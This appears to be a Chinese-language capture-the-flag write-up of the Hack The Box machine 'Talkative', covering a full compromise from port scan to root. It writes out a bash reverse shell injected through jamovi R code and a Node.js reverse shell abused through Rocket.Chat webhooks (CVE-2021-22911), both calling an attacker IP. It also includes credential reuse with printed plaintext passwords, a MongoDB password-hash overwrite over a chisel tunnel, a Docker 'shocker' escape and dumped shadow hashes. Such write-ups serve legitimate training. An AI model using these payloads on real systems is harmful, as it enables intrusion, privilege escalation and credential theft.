基本信息

端口扫描

22,80,3000,8080,8081,8082,注意22被防火墙过滤了,外部用不了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
$ nmap -sC -sV 10.10.11.155
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-21 13:35 CST
Nmap scan report for 10.10.11.155
Host is up (0.22s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   filtered ssh
80/tcp   open     http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Debian)
|_http-title: Did not follow redirect to http://talkative.htb
3000/tcp open     ppp?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     X-XSS-Protection: 1
|     X-Instance-ID: W8u2yS8skXBJ9hTgb
|     Content-Type: text/html; charset=utf-8
|     Vary: Accept-Encoding
|     Date: Thu, 21 Apr 2022 05:36:17 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/3ab95015403368c507c78b4228d38a494ef33a08.css?meteor_css_resource=true">
|     <meta charset="utf-8" />
|     <meta http-equiv="content-type" content="text/html; charset=utf-8" />
|     <meta http-equiv="expires" content="-1" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
|     <meta name="fragment" content="!" />
|     <meta name="distribution" content="global" />
|     <meta name="rating" content="general" />
|     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
|     <meta name="mobile-web-app-capable" content="yes" />
|     <meta name="apple-mobile-web-app-capable" conten
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     X-XSS-Protection: 1
|     X-Instance-ID: W8u2yS8skXBJ9hTgb
|     Content-Type: text/html; charset=utf-8
|     Vary: Accept-Encoding
|     Date: Thu, 21 Apr 2022 05:36:19 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/3ab95015403368c507c78b4228d38a494ef33a08.css?meteor_css_resource=true">
|     <meta charset="utf-8" />
|     <meta http-equiv="content-type" content="text/html; charset=utf-8" />
|     <meta http-equiv="expires" content="-1" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
|     <meta name="fragment" content="!" />
|     <meta name="distribution" content="global" />
|     <meta name="rating" content="general" />
|     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
|     <meta name="mobile-web-app-capable" content="yes" />
|     <meta name="apple-mobile-web-app-capable" conten
|   Help, NCP:
|_    HTTP/1.1 400 Bad Request
8080/tcp open     http    Tornado httpd 5.0
|_http-server-header: TornadoServer/5.0
|_http-title: jamovi
8081/tcp open     http    Tornado httpd 5.0
|_http-server-header: TornadoServer/5.0
|_http-title: 404: Not Found
8082/tcp open     http    Tornado httpd 5.0
|_http-server-header: TornadoServer/5.0
|_http-title: 404: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=4/21%Time=6260ED52%P=x86_64-apple-darwin20.4.
SF:0%r(GetRequest,31BA,"HTTP/1\.1\x20200\x20OK\r\nX-XSS-Protection:\x201\r
SF:\nX-Instance-ID:\x20W8u2yS8skXBJ9hTgb\r\nContent-Type:\x20text/html;\x2
SF:0charset=utf-8\r\nVary:\x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Ap
SF:r\x202022\x2005:36:17\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x
SF:20html>\n<html>\n<head>\n\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"
SF:text/css\"\x20class=\"__meteor-css__\"\x20href=\"/3ab95015403368c507c78
SF:b4228d38a494ef33a08\.css\?meteor_css_resource=true\">\n<meta\x20charset
SF:=\"utf-8\"\x20/>\n\t<meta\x20http-equiv=\"content-type\"\x20content=\"t
SF:ext/html;\x20charset=utf-8\"\x20/>\n\t<meta\x20http-equiv=\"expires\"\x
SF:20content=\"-1\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20co
SF:ntent=\"IE=edge\"\x20/>\n\t<meta\x20name=\"fragment\"\x20content=\"!\"\
SF:x20/>\n\t<meta\x20name=\"distribution\"\x20content=\"global\"\x20/>\n\t
SF:<meta\x20name=\"rating\"\x20content=\"general\"\x20/>\n\t<meta\x20name=
SF:\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1,\x20ma
SF:ximum-scale=1,\x20user-scalable=no\"\x20/>\n\t<meta\x20name=\"mobile-we
SF:b-app-capable\"\x20content=\"yes\"\x20/>\n\t<meta\x20name=\"apple-mobil
SF:e-web-app-capable\"\x20conten")%r(Help,1C,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\n\r\n")%r(NCP,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")
SF:%r(HTTPOptions,31BA,"HTTP/1\.1\x20200\x20OK\r\nX-XSS-Protection:\x201\r
SF:\nX-Instance-ID:\x20W8u2yS8skXBJ9hTgb\r\nContent-Type:\x20text/html;\x2
SF:0charset=utf-8\r\nVary:\x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Ap
SF:r\x202022\x2005:36:19\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x
SF:20html>\n<html>\n<head>\n\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"
SF:text/css\"\x20class=\"__meteor-css__\"\x20href=\"/3ab95015403368c507c78
SF:b4228d38a494ef33a08\.css\?meteor_css_resource=true\">\n<meta\x20charset
SF:=\"utf-8\"\x20/>\n\t<meta\x20http-equiv=\"content-type\"\x20content=\"t
SF:ext/html;\x20charset=utf-8\"\x20/>\n\t<meta\x20http-equiv=\"expires\"\x
SF:20content=\"-1\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20co
SF:ntent=\"IE=edge\"\x20/>\n\t<meta\x20name=\"fragment\"\x20content=\"!\"\
SF:x20/>\n\t<meta\x20name=\"distribution\"\x20content=\"global\"\x20/>\n\t
SF:<meta\x20name=\"rating\"\x20content=\"general\"\x20/>\n\t<meta\x20name=
SF:\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1,\x20ma
SF:ximum-scale=1,\x20user-scalable=no\"\x20/>\n\t<meta\x20name=\"mobile-we
SF:b-app-capable\"\x20content=\"yes\"\x20/>\n\t<meta\x20name=\"apple-mobil
SF:e-web-app-capable\"\x20conten");
Service Info: Host: 172.17.0.18

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.53 seconds

80

需要加hosts

1
10.10.11.155 talkative.htb

Bolt cms:

3000

rocket chat:

8080

jamovi 0.9.5.5:

8081/8082

直接访问是404: Not Found

jamovi

8080的jamovi,可以直接运行R语言代码,是在一个容器中:

1
2
system("bash -c 'id && hostname'", intern = TRUE) 
system("bash -c 'bash -i >& /dev/tcp/10.10.14.14/4444 0>&1'",intern=TRUE)

bolt-administration.omv

/root目录有个bolt-administration.omv文件,下载下来分析,容器不方便下载操作,可以直接base64,omv就是zip文件,直接解压,解压出来的文件中,xdata.json里得到几组账号密码:

1
2
3
4
base64 bolt-administration.omv

echo xxxx | base64 -d > bolt-administration.omv
unzip bolt-administration.omv

xdata.json

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
{
  "A": {
    "labels": [
      [
        0,
        "Username",
        "Username",
        false
      ],
      [
        1,
        "matt@talkative.htb",
        "matt@talkative.htb",
        false
      ],
      [
        2,
        "janit@talkative.htb",
        "janit@talkative.htb",
        false
      ],
      [
        3,
        "saul@talkative.htb",
        "saul@talkative.htb",
        false
      ]
    ]
  },
  "B": {
    "labels": [
      [
        0,
        "Password",
        "Password",
        false
      ],
      [
        1,
        "jeO09ufhWD<s",
        "jeO09ufhWD<s",
        false
      ],
      [
        2,
        "bZ89h}V<S_DA",
        "bZ89h}V<S_DA",
        false
      ],
      [
        3,
        ")SQWGm>9KHEA",
        ")SQWGm>9KHEA",
        false
      ]
    ]
  },
  "C": {
    "labels": []
  }
}

Bolt cms

根据已知信息,80是bolt cms,得到的密码信息是bolt-administration,所以回到80,bolt cms默认登陆路径尝试复用密码,成功登录,Bolt version 5.1.3:

1
2
3
http://talkative.htb/bolt/login

admin : jeO09ufhWD<s

后台直接修改php文件,得到另一个容器www-data shell:

setting -> configxxxx -> all configxxx files,进去修改php文件,然后访问任意页面触发:

1
http://talkative.htb/bolt/file-edit/config?file=/bundles.php

升级tty,没有python,可以这样升:

1
script -qc /bin/bash /dev/null

user flag

容器内可以ssh连接到宿主机,复用前面得到的那些账号密码:

1
2
3
4
script -qc /bin/bash /dev/null

ssh saul@10.10.11.155
jeO09ufhWD<s

mongo

运行pspy可以发现mongo相关,检查发现mongo是另一个容器:

1
2
3
4
5
6
7
8
9
2022/04/09 21:31:01 CMD: UID=0    PID=79640  | /bin/sh -c cp /root/.backup/passwd /etc/passwd 
2022/04/09 21:31:01 CMD: UID=0    PID=84170  | cp /root/.backup/shadow /etc/shadow 
2022/04/09 21:51:01 CMD: UID=0    PID=84169  | python3 /root/.backup/update_mongo.py 
2022/04/09 21:51:01 CMD: UID=0    PID=84172  | python3 /root/.backup/update_mongo.py

saul@talkative:~/.ssh$ netstat -ano | grep 27017
netstat -ano | grep 27017
tcp        0      0 172.17.0.1:42930        172.17.0.2:27017        TIME_WAIT   timewait (44.67/0/0)
tcp        0      0 172.17.0.1:42928        172.17.0.2:27017        TIME_WAIT   timewait (44.67/0/0)

转发端口,枚举数据库,其中得到rocket.cat相关信息,密码破解不出来,但可以修改为已知明文的密文:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# remote
wget 10.10.14.14:7777/chisel_1.7.6_linux_amd64
./chisel_1.7.6_linux_amd64 client 10.10.14.14:6969 R:27017:172.17.0.2:27017
 
# local
 ./chisel_1.7.0-rc7_darwin_amd64 server -p 6969 --reverse
 
# mongo
brew install mongosh
mongosh "mongodb://LOCALHOST:27017"

show databases
use admin
show tables
db.system.keys.find()
use meteor
show tables
db.users.find()

# 明文 12345
db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })

Rocket.Chat

使用修改后的密码登录3000端口的Rocket.Chat,版本2.4.14:

搜到相关漏洞:

CVE-2021-22911

集成(integrations) webhook运行自定义nodejs代码,添加之后得到调用的curl命令,运行触发,得到该容器root:

1
curl -X POST -H 'Content-Type: application/json' --data '{"username":"miao","text":"Example message","attachments":[{"title":"Rocket.Chat","title_link":"https://rocket.chat","text":"Rocket.Chat, the best open source chat","image_url":"/images/integration-attachment-example.png","color":"#764FA5"}]}' http://10.10.11.155:3000/hooks/YemLLtCAsASjTYtF6/8zLfJzKrSodq2o7owhfdbFjwknGXmXE3mJbH9eeMzsxmuBmL

reverse.js

1
2
3
4
5
6
7
8
const require = console.log.constructor('return process.mainModule.require')();
var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4444, "10.10.14.14", function(){
  client.pipe(sh.stdin);
  sh.stdout.pipe(client);
  sh.stderr.pipe(client);
});

docker逃逸 & root flag

没有curl和wget,还是通过base64写文件进去运行,自己修改c代码获取需要的文件内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
    die("[-] open");

if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0)
    die("[-] Cannot find valid handle!");

# local
gcc shocker.c -o shocker
base64 shocker

# target
echo xxx | base64 -d > shocker
chmod +x shocker
./shocker

shadow

1
2
root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7:::
saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::

参考资料